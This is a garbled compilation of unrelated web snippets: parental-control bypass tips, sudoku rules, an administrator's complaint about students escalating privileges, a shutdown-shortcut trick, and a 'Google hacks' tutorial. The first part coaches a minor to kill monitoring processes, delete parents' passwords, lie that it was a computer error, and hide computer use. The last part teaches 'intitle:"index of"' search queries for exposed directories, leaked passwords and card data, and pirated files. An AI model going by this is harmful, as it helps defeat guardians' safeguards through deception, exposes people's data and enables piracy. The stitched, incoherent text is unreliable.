Try the Guest account route for program restrictions. Other than that, if you have trouble installing the program, then download the binaries, if you can't do that, then unpack the installer file with 7zip or Universal Extractor (Can be run from flash drive.). If you have trouble running the program, then either run Ubuntu on top of Windows, or boot with Ubuntu, then run/install the program from there. Alternately, you could install the program on a flash drive quickly when an admin leaves their account on and goes to get coffee, etc., although if you have such problems, there are much better uses for a few minutes of admin power. You can also ask a friend (who can do it, obviously) to install the program on his/her PC/Mac, and then give the installed version to you. There are many programs where 7zip and UniExtracter do not work, in this cas, use another extractor/unzipper. Ideally, you should only use Ubuntu if all else fails, and you know what you are doing.

Find a Linux LiveCD and boot off that. Vista can't do a thing if it's not running! Note that this method is extremely obvious if anyone looks over your shoulder, but that can be mitigated by using a Windows-like theme.

Tips

Open Task Manager, go to "Processes", and terminate the one that says (description, not name) parental control notifications, or something similar.

If you can get to the parental controls on your account the click manage other accounts the delete the passwords for your parents and say that there is no way you could change it and it must be a computer error also check your parents accounts they might not have a password.

Remember that deleting your internet history only "deletes" what *you* can see. Once you go to a site, the administrator account(s) is/are immediately notified and will still see it even after you tell it to delete.sometimes there are multiple administrator accounts.

If you avoid the time restrictions, at least make it seem like you're not using it after it's logged you out. Turn the screen off if you're not *RIGHT THERE*, even if you're turning around or going to the bathroom. Parents just love to come in and see what you're doing while you can't see them.

If you have a noisy computer, be careful, as sometimes that can be the worst giveaway. If you're intent on using the computer still, try using it when your parents aren't home, or put on some music as long as it's not too late. Be careful, though, playing music from your computer wouldn't be wise, because sometimes you can tell where the sound is coming from. Try burning your music to a CD and use a player, or use an iPod stereo. If you can't do either of these, just put on the radio.

If you plan on using the Guest account as your main one (if it has no restrictions), be careful with time restrictions. As mentioned above, either set a timer or keep a careful eye on the clock. A few minutes can pass as the computer being slightly off, but more than that doesn't always click with most parents.

Also, if you plan on using the Guest account regularly, you may want to save your important documents in the "Public" file, so that you can access them from the Guest account. Otherwise you'll be locked out when you're in the Guest and SOL if you need something from your own account.

Warnings

If you get caught, you can get in big trouble, with your parents and, if you're going to mature sites, with the law (if you're underage-though why would you have Parental Controls if you're not under 18?)

The Basic Rules

The classic sudoku has 3 simple rules. Just knowing these three rules you can solve lots of sudokus.

The classic sudoku is a 9x9 grid with a few digits scattered here and there. Your aim is to fill digits into the blank spaces. And you need to follow 3 simple rules to fill these blanks. The rules are:

All the 3x3 sections (yellow) must have every digit from 1-9, without repetition
All rows (blue) must have every digit from 1-9, without repetition
All columns (green) must have every digit from 1-9, without repetition

In the sample sudoku problem above, I've highlighted the top-left section, the 7th column and the 5th row.

Rows/Columns/Sections with a single digit left

This is a simple one. If a row, column or a section has only a single digit left, you can easily figure it out. As an example, have a look at the fifth row (white) in the following sudoku:

To figure out the digit at the center, the following would be the line of thought:

This row has only a single digit left to be filled.
This row has 1, 2, 4, 5, 6, 7, 8, 9 in it.
Each and every row MUST have every digit from 1 to 9. This row doesn't have a 3. Hence the blank spot in the row should be filled with a 3.

This works equally well with columns and sections too.

Multiple intersections

This is probably one of the most used technique for solving sudokus. I'll explain this logic through the following example:

We're trying to place a 2 in the left-bottom section (white). Here's the line of thought:

This section cannot have a 2 in the top row (ie the seventh row from top). There already is a 2 in that row... and each row can have only a single 2.
Similarly, the bottom row of the section cannot have a 2.
The middle column of the section also cannot have a 2... there already exists a 2 in that column... and each row can have only a single 2.
Every section MUST have a 2. But the only location left for a 2 is row eight, column one (the left-middle spot in the section). Hence it will have a 2 there.

Row/Column operations

This piece of logic isn't as techy as it sounds! Its just that this one reminds me of matrices. Somehow. Anyway, leave that.

Consider the white highlighted column in the sudoku above. We're trying to fill up this column. You'd think like this to fill it up:

I need to fill up this column.
This row has 1, 2, 3, 4, 6, 7, 8. The missing digits are 5 and 9.
5 can be placed at any of the two locations.
9 can be placed only at the upper blank spot in the row. This is because the left-bottom section already has a 9... and any section cannot have repeated digits.
Now that I know the location of 9... 5 will definitely go to the lower blank spot.

One of the place that I work at has a few hundreds of computers and it is shared by students. Each student has their own user account which is a limited user account. Sometimes the lecturer there will complain to me that the administrator password has been hacked and changed by the students. This can be easily done if they did not set a security password for BIOS and allows the student to boot up the computer with a CD that is equipped with a tool to reset any local user account’s password. When the teachers reported to me that the students managed to turn a limited user account into a computer administrator, my guess was the students reset the administrator password, login as admin and changed the account type to administrator.
But I was wrong. It turns out that the students did not reset the admin password and they were able to do it without logging in to Windows as administrator. After a little searching, I found a free tool that can change a Windows XP limited user account into a computer administrator.

We cannot set a BIOS password because if the students entered the wrong security password for 3 times, it’ll be locked and we’ll have to contact HP support and get them to reset it. If you have a way to prevent from the students from editing user accounts without logging in as administrator, please share it with me.

Right click on your desktop and choose "New=>shortcuts".
In the box that says "Type the location of the shortcut",
type in "shutdown -s -t 3600" without the quotation marks and click next. Note: 3600 are the amount of seconds before your computer shuts down. So , 60secs*60mins=3600secs.
Make up a name for the shortcut and you're done.
You can change the icon by right clicking=>properities=>change icon=>browse
TO ABORT:
To make an abort key to stop the shutdown timer just create another shortcut and make
the "location of the shortcut" to " shutdown -a" without the quotes.

********* METHOD # 2 **************{EASIER THAN THE PREVIOUS ONE}

Here is another trick to shutdown at a specific time, for example you wish to shutdown at 11:35am. Type this in

Google is a very very very powerful tool! If you know how the Internet works and you know how Google works, you can find out some “very secret information” from the dark corners of the Internet.

You see, Google tries to “index” everything that is on the Internet. What does “index” mean? Basically, “index” means, read and remember!

You see, Google is reading websites on the Internet 24 hours a day. It is looking at new websites and new web pages. It looks at each web page and finds out what the web page is about. It decides how good the web page is and also decides many other things about the web page…

Google does all this so that when you search for something using Google, it can give you the most relevant results from among the web pages it has visited. This is what we mean when we say that Google tries to index everything on the Internet.

Now, the part we are interested in: Since Google indexes the Internet, we can find things that are hidden in all the corners of the Internet. If some one has put their password on the net, you can find it! If a big online shopping site, has put all the credit card information of it’s customers on the net, you can find it! You can find some very interesting things if you know how to use Google!

This article will teach you the basics of how to find cool things using Google.

The "funda" behind Google hacks!
On the Internet, the files are saved in the same way as they are saved on your computer. All the files are organized into folders so that they are easy to understand and use.

For example: On your computer, you may have different folders like, “music” or “videos” or “documents” etc.. On the Internet also files are generally organized into folders. For example, a mp3 music website site may have all the songs that the website provides in a directory called “songs”!

Now, if you can use Google to find the "songs" directory, you will have the directory and all the songs in it! That is basically what we are going to teach you how to do…

Note that, it’s not as simple as that. All the big sites, that serve 1000’s of songs and charge for it, are not going to just have their “songs” directory in the open for anyone to hack. There are many ways to protect your website from these Google hacks! Most big websites are protected from Google hacks.

But, this hack is still quite useful because there are many small websites out there who have their “songs” directory in the open and un-protected for anyone to see…

will be part of almost every un-protected directory. There is also one other part that is there in every un-protected directory on the Internet. This part is, the words: “Index of” in the “Title” of the web page.If you are not sure what the "title" of a web page is, you could look up to the top-most part of thiswindow. The line right on top is called the title. For example: The title of this web page is: “How to find un-protected directories using Google? :: indiahowto.com”

Similarly, the title of an unprotected web-page will have the words “Index of” in it. So, we are going to get Google to search for all these web pages of un-protected directories. We will be able to do this, using some basic Google commands....You are probably wondering why we were talking about the "Index of" and the other common elements of the un-protected directory...well, continue to read, then next page will clear up all your doubts....Google is a search engine and a whole lot more. There are many cool things you can do with Google…For example: Try this….go to Google and type in “122131 + 32112” or “13324 - 231” or “2332 / 231” See what it gives you. Google can also be used as a calculator!

But, that is not needed for what we are trying to do. We just mentioned it so that you would know that there is a lot that Google can do….

What we are trying to do is look for pages that have:
The phrase “Index of” in the title
The phrase “Index of” on the page
The word “Name” on the page
The word “Size” on the page
The word “Description” on the page
The word “Last Modified” on the page
If you we find pages that fit this criteria, we will have found all the un-protected directories on the Internet. So how do we do this?

Type this line in the Google search box:
intitle:"index of" +"index of" +size +name +description +modified

When you search for this, you will find all the un-protected directories on the Internet that Goggle has found! Try to see what people have stored in the unprotected directories! It could be fun!
But, what is more important is, let us try to understand how that line works. Once you understand how that line works, you will be able to make your own lines and extract all sorts of cool things out of Google.

The line: intitle:"index of" +"index of" +size +name +description +modified

It is made up of many different small Google commands. The different commands are:

intitle:"index of": This tells Google to only search for web pages with the term “index of” in the Title of the web page. The term “intitle:” is called an OPERATOR.

So if you have intitle:"index of" in the search box, Google knows that it has to search for only pages with “index of” in the title…

+"index of": This tells Google that all the pages that come in the search results, must have “index of” on the page.

The “+” basically tells Google that whatever is after the “+” MUST be there in all the pages that Google provides in the results.

For example: You go to Google and type in “monkey +cat” it will provide all the pages that have the term monkey and also have the term “cat” in them. If you just type in “monkey cat” then the pages that have “monkey or cat” or “monkey and cat” may show up in the search results.

Basically, just remember if you want all searched pages to have a particular word, use the “+”! This is useful is the cases when you are searching for a “synonym” kind of word.

For example: Let us say you are searching for an article about “voice recognition”. But whenever, you type in “voice recognition” the results that come are about “Asha Bhosle”! But what you are looking for is the “method” of voice recognition.

So, to clear up the results, you can use a search terms like this:
“voice recognition” +method –“Asha Bhosle"

Now, you may get much better search results! The search results will be about “voice reognition”…. It will have only pages with the word “method” in them and it will NOT have pages with the term “Asha Bhose” in them.

Things to notice:
If you put anything within “quotation” marks, Google searches for that exact phrase
A “+” behind a term will make sure that term is there in all the results pages
A “-“ behind a term will make sure that term is NOT there in all the results pages
There is NO SPACE between the “+” and the term or the “-“ and the term. Basically there is no space between the “operator” and the term.
Having understood all this, let us look at the whole line again. It should make much more sense:

intitle:"index of" +"index of" +size +name +description +modified

The line basically tells Google to search for pages with:
The phrase “index of” in the title
The phrase “index of” somewhere on the page
The word “name” somewhere on the page
The word “size” somewhere on the page
The word “description” somewhere on the page
The word “modified” somewhere on the page
And if you understood everything till now, you will see how this command can be used to find all the un-protected directories on the Internet! Look at it carefully....

intitle:"index of" +"index of" +size +name +description +modified

Now, let us do cool stuff….let us find ebooks, games, songs etc.. in these un-protected directories!Finding ebooks, games, songs and much more…
Having understood all this till here, this part should be pretty simple. Let us say you want to find songs, you simply have to tell Google to look for “mp3” files in all the un-protected directories.

To do this you can use this line:
intitle:"index of" +"index of" +size +name +description +modified +mp3

It makes sense, does it not? Just add a “+mp3” at the end. This will make sure that all the pages come up have the term “mp3” in them.

Similarly, if you wanted to find all the “ebooks” in all the up-protected directories, you could use this line:
intitle:"index of" +"index of" +size +name +description +modified +pdf

Incase, you are not sure what “pdf” is, “pdf” is the format in which ebooks come!

You probably get the idea now. But, you are still not getting what exactly you are looking for…you are just getting all the un-protected ebooks and mp3s!

Let us make the search more specific. You can search for a “Dil Se" mp3 using a line like this:
intitle:"index of" +"index of" +size +name +description +modified +mp3 dil se

Notice that I have not put “dil se” in quotes or in front of a “+”. This is because I do not know how the “dil se” file will be saved! It may be saved by some different name like “dilse23.mp3”! So I just let Google figure out the closest match! Basically if you are not sure about the exact words the web page will contain, just type it without any operator or quotes and let Google figure out the closest match!

Now, you probably have a good understanding of how to get the search to work for you. Just to give you a few examples:

To search for WinZip program in the un-protected directories you might use something like:
intitle:"index of" +"index of" +size +name +description +modified +exe win zip

To search for a “Harry Potter” ebook, you might want to use something like:
intitle:"index of" +"index of" +size +name +description +modified +pdf harry potter

Please Note: You may not get what you are looking for each and every time. Somethings are just too valuable to keep in an un-protected directory! But, most of the time you will be able to find what you are looking for!
